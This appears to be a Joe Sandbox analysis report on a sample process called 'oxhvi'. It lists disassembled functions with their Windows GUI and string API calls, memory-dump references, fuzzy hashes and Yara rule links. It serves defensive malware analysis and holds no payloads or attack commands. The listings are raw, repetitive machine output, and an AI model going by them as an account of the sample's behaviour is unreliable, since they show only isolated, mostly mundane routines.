                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00598FE3,00000000,?,0000001C,?,?,00000000), ref: 005981B2
                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00598FE3,00000000,?,0000001C,?,?,00000000), ref: 005981D8
                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00598FE3,00000000,?,0000001C,?,?,00000000), ref: 00598213
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                      • String ID: cdecl
                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                      • Opcode ID: 3ec50fa0a55a48760d8c846aefaca26b1ee595049513c287bbe2aa345d177ec7
                                                                                                                                                      • Instruction ID: 4b5bc1b7a56a2a51c77b0c678b2335373957da03bdc83b44c0cf922668249113
                                                                                                                                                      • Opcode Fuzzy Hash: 3ec50fa0a55a48760d8c846aefaca26b1ee595049513c287bbe2aa345d177ec7
                                                                                                                                                      • Instruction Fuzzy Hash: F711033A200702AFCF145F39C858E7A7BB9FF99750B50402AF902CB290EF729801D7A1
                                                                                                                                                      Function 005C8621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 005C866A
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 005C8689
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 005C86A1
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,005AC10A,00000000), ref: 005C86CA
                                                                                                                                                        • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 847901565-0
                                                                                                                                                      • Opcode ID: 3075b3321d32e72ab399954b42fcf1b13ae04ba09c9725c37ada5bf72c325a94
                                                                                                                                                      • Instruction ID: 5f3e5d4a5fe0b79fb6657ecfa7ce914affbe6627580597f584e0ec72e6140abb
                                                                                                                                                      • Opcode Fuzzy Hash: 3075b3321d32e72ab399954b42fcf1b13ae04ba09c9725c37ada5bf72c325a94
                                                                                                                                                      • Instruction Fuzzy Hash: EE119D32500625AFCB108FA9CC08FAB3BA5FB55360F154729F939DB2E0DB308991DB50
                                                                                                                                                      Function 00562099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f6e1b9ecd000e6e628859e74c7a7c0392b4bdb78bba97b3f4ceb4345476aa5d8
                                                                                                                                                      • Instruction ID: a0b9b91c54a6fc06f9b2c597279802cdae98bc3eb260dfb2bdf3bf7304c10efa
                                                                                                                                                      • Opcode Fuzzy Hash: f6e1b9ecd000e6e628859e74c7a7c0392b4bdb78bba97b3f4ceb4345476aa5d8
                                                                                                                                                      • Instruction Fuzzy Hash: 0901DFB2209A063EE72026786CC9F276B1DEF923B8F340329B621A21D1EE708C419170
                                                                                                                                                      Function 005922B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 005922D7
                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005922E9
                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005922FF
                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0059231A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                      • Opcode ID: 54ecb0de14cf2ea55b84a2a973043d007edbee04fd9e44e614dfacc35ee60da4
                                                                                                                                                      • Instruction ID: c3a3b9de32a5336977b69108a89cf160657f1a8bfa2087a5c04d10ffe638bd82
                                                                                                                                                      • Opcode Fuzzy Hash: 54ecb0de14cf2ea55b84a2a973043d007edbee04fd9e44e614dfacc35ee60da4
                                                                                                                                                      • Instruction Fuzzy Hash: E011093A940219FFEF119BA5CD85F9DFBB8FB08750F200491EA00B7290D6716E10DB94
                                                                                                                                                      Function 005CA852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 005CA890
                                                                                                                                                      • GetCursorPos.USER32(?), ref: 005CA89A
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005CA8A5
                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 005CA8D9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                      • Opcode ID: 36d46c25472363b8c4704c4cea452b6adc39df5bbb0433000839bbcd0e82dc9e
                                                                                                                                                      • Instruction ID: 4f7182db5729a3c38d3f643bfc89e4eec88c5f4eb0a3a4455b3c5528689d7dce
                                                                                                                                                      • Opcode Fuzzy Hash: 36d46c25472363b8c4704c4cea452b6adc39df5bbb0433000839bbcd0e82dc9e
                                                                                                                                                      • Instruction Fuzzy Hash: 8A11287190051EEFEF149F94D849EEE7FB8FB44308F004469E911E2190D730AA86DBA2
                                                                                                                                                      Function 0059EA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0059EA29
                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 0059EA5C
                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0059EA72
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0059EA79
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                      • Opcode ID: 571f48143885dba1bfa8844d979c428b9f3641836c9de511f256d570bb41e8b4
                                                                                                                                                      • Instruction ID: f940e7bacb59a543e1edc924ac1afadd0552990099dcd864987760b511d80ac1
                                                                                                                                                      • Opcode Fuzzy Hash: 571f48143885dba1bfa8844d979c428b9f3641836c9de511f256d570bb41e8b4
                                                                                                                                                      • Instruction Fuzzy Hash: 4811A576904259AFCB15EBA89C0AA9B7FAEFB45310F044266F825D3290D675890487B1
                                                                                                                                                      Function 005C8773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 005C8792
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005C87AA
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005C87CE
                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 005C87E9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                      • Opcode ID: f1c9cb7614955e7ebd02277e9945728905d1dfe4e95c4b2a4eecd0317502bb14
                                                                                                                                                      • Instruction ID: 91677351b65225ff1ee22ef29457a812b5bf987cac4b44331cb5b92bdd064a25
                                                                                                                                                      • Opcode Fuzzy Hash: f1c9cb7614955e7ebd02277e9945728905d1dfe4e95c4b2a4eecd0317502bb14
                                                                                                                                                      • Instruction Fuzzy Hash: C51114B9D00209EFDB41DF98C884AEEBBF5FB18314F104166E915E3610D735AA95DF50
                                                                                                                                                      Function 00532150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 0053216C
                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00532176
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00532189
                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00532191
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Color$ModeObjectStockText
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4037423528-0
                                                                                                                                                      • Opcode ID: a89a230d3e64573b9694347f50e4e976833715dd5fd95731eb04ddec4d671492
                                                                                                                                                      • Instruction ID: 734ca61cc7f0d83032dbb4db1bc41d9629befe958101890fbc247c66f07a410a
                                                                                                                                                      • Opcode Fuzzy Hash: a89a230d3e64573b9694347f50e4e976833715dd5fd95731eb04ddec4d671492
                                                                                                                                                      • Instruction Fuzzy Hash: 2FE0E531644A40AEDB215B75BC09BD97F71AB22335F18C225F6BA940E1C7724645FB21
                                                                                                                                                      Function 0058EBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0058EBD6
                                                                                                                                                      • GetDC.USER32(00000000), ref: 0058EBE0
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0058EC00
                                                                                                                                                      • ReleaseDC.USER32(?), ref: 0058EC21
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                      • Opcode ID: 5f28833599b9798dcf1b3cb9d7ef01736df7affb0a0a640a73a248d483867e3f
                                                                                                                                                      • Instruction ID: de4ad618e58821d94febdf68135185482fab4d98b1e60eb38ea12237444e536e
                                                                                                                                                      • Opcode Fuzzy Hash: 5f28833599b9798dcf1b3cb9d7ef01736df7affb0a0a640a73a248d483867e3f
                                                                                                                                                      • Instruction Fuzzy Hash: A9E01AB5900A01EFCF50AFA0980DE6DBFB1FB58311F108859E84AE3250CB384985EF20
                                                                                                                                                      Function 0058EBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0058EBEA
                                                                                                                                                      • GetDC.USER32(00000000), ref: 0058EBF4
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0058EC00
                                                                                                                                                      • ReleaseDC.USER32(?), ref: 0058EC21
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                      • Opcode ID: 32a3d70d9d4f9b4efdfc7da9582ffc45b80034db81cb7b9d593a3c9744064887
                                                                                                                                                      • Instruction ID: de0064f649faffeb55be7ebc3df9c3b8f2d122be8ea482ceb520fb0b64f6d6fb
                                                                                                                                                      • Opcode Fuzzy Hash: 32a3d70d9d4f9b4efdfc7da9582ffc45b80034db81cb7b9d593a3c9744064887
                                                                                                                                                      • Instruction Fuzzy Hash: D7E01AB5900A01DFCF509FA0980DA6DBBB1FB58314F108459E94AE3250C7385945EF20
                                                                                                                                                      Function 0055E60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0055E69D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                      • String ID: pow
                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                      • Opcode ID: 14af7d87c69dacc9ca5552e82e6f5e618ba331a8b994796d45aa6ffb8e9b0796
                                                                                                                                                      • Instruction ID: dc7e7972ecc41d3282a3a66bfcb2f8f59f2c4a01fae1f42a3ab033cb66c355cb
                                                                                                                                                      • Opcode Fuzzy Hash: 14af7d87c69dacc9ca5552e82e6f5e618ba331a8b994796d45aa6ffb8e9b0796
                                                                                                                                                      • Instruction Fuzzy Hash: 36517A61A0910286CB197714DD2637A2FA4FB60741F304F6BE8D5432E9EF348ECDDA46
                                                                                                                                                      Function 0054A86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: #
                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                      • Opcode ID: c4cbe0321d36fc3802c1a46415904b5d4a0ebc7b1dad8902299c04c11b48ab11
                                                                                                                                                      • Instruction ID: 068c729d55da7bb183fe6c622a9bbc29db5a1e018416555eb21653ad045173bd
                                                                                                                                                      • Opcode Fuzzy Hash: c4cbe0321d36fc3802c1a46415904b5d4a0ebc7b1dad8902299c04c11b48ab11
                                                                                                                                                      • Instruction Fuzzy Hash: A3512F36504247DFDF25EF28C484AFA7FA0FF55318FA44059EC91AB2A1DA30AD46CB61
                                                                                                                                                      Function 005B60A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                                                                                      • String ID: CALLARGARRAY
                                                                                                                                                      • API String ID: 157775604-1150593374
                                                                                                                                                      • Opcode ID: 940065161ae202cdacc484dec545279d76f84a5d5ba6a5511b17ac4e8b4d678f
                                                                                                                                                      • Instruction ID: 044b415f8f4a9b6a1c61a2488617bb351d09a4958915690baa2972deecb8d870
                                                                                                                                                      • Opcode Fuzzy Hash: 940065161ae202cdacc484dec545279d76f84a5d5ba6a5511b17ac4e8b4d678f
                                                                                                                                                      • Instruction Fuzzy Hash: 93418071A0061A9FCB04DFA9C88A9FEBFB5FF98314F144069E906A7252D774AD81CB50
                                                                                                                                                      Function 00532060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
                                                                                                                                                        • Part of subcall function 005321E4: GetWindowLongW.USER32(?,000000EB), ref: 005321F2
                                                                                                                                                      • GetParent.USER32(?), ref: 00573404
                                                                                                                                                      • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0057348E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LongWindow$ParentProc
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 2181805148-1270690246
                                                                                                                                                      • Opcode ID: dd0a348e8781229f06b5925cef1f6679c33030baa54c25baf5b71f7834e9ceb6
                                                                                                                                                      • Instruction ID: 2e5427d410f479f75456cd3d16f7050bb1ec9b4f77e3615f6805caf9570e97ac
                                                                                                                                                      • Opcode Fuzzy Hash: dd0a348e8781229f06b5925cef1f6679c33030baa54c25baf5b71f7834e9ceb6
                                                                                                                                                      • Instruction Fuzzy Hash: B6215E74600514AFCF2E9F68DC5CDAA3FA6FF46370F148254F5194B2A1C3319E55E650
                                                                                                                                                      Function 005C406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00537759
                                                                                                                                                        • Part of subcall function 0053771B: GetStockObject.GDI32(00000011), ref: 0053776D
                                                                                                                                                        • Part of subcall function 0053771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00537777
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 005C40D9
                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 005C40F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
